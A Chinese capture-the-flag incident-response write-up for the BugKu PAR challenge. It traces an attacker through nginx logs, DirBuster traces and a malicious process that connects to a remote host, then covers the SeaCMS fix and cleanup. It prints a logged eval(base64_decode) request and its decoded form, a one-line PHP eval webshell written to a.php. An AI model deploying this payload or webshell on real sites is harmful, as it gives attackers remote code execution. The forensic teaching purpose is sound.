
AI摘要:文章详细介绍了BugKu PAR网络安全事件应急响应的过程,包括提交攻击者的IP地址,识别攻击者使用的工具,确定首次攻击成功的时间,找到攻击者写入的恶意后门文件和密码,识别隐藏在正常web应用代码中的恶意代码,识别系统中存在的恶意程序进程,修复网站漏洞,以及删除恶意程序、文件、代码等步骤。
统计nginx日志中各个ip访问的次数
root@bugku:/var/log/nginx# awk '{print $1}' access.log | sort | uniq -c | sort -nr
15357 38.207.130.14
16 112.19.25.194
2 212.70.149.142
2 149.50.96.22
1 198.235.24.139
1 192.241.229.42
1 185.196.9.102
1 141.98.11.60
1 141.98.11.52结合题目知道38.207.130.14为攻击者ip
grep '38.207.130.14' access.log发现大量ua为DirBuster-1.0-RC1 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)的日志
所以使用的工具为DirBuster
审查日志找到时间戳[03/Nov/2023:15:01:13 +0800]

故攻击成功时间为03/11/2023:15:03:35
得到日志
38.207.130.14 - - [03/Nov/2023:15:03:35 +0800] "POST /search.php?eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/PicpOw==')); HTTP/1.1" 200 4527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36"对参数解码得到
file_put_contents('a.php','<?php eval($_POST[1]); ?>');所以写入shell路径为
/var/www/html/a.php如上,得到的密码为1
没别的办法,一个个看最终找到/var/www/html/include/webscan/360webscan.php

查看进程找到可疑进程/var/crash/php-fpm

运行php-fpm并使用netstat -anutp得到38.95.101.254:443
打开首页发现使用的海洋CMS 搜索资料得到修改/var/www/html/include/main.class.php文件里面的parseIf方法,在数组后面加入一个成员_SERVER

/var/www/html/include/webscan/360webscan.php中找到的恶意代码webshell文件/var/www/html/a.php/var/crash/php-fpmcrontab -e -u www-data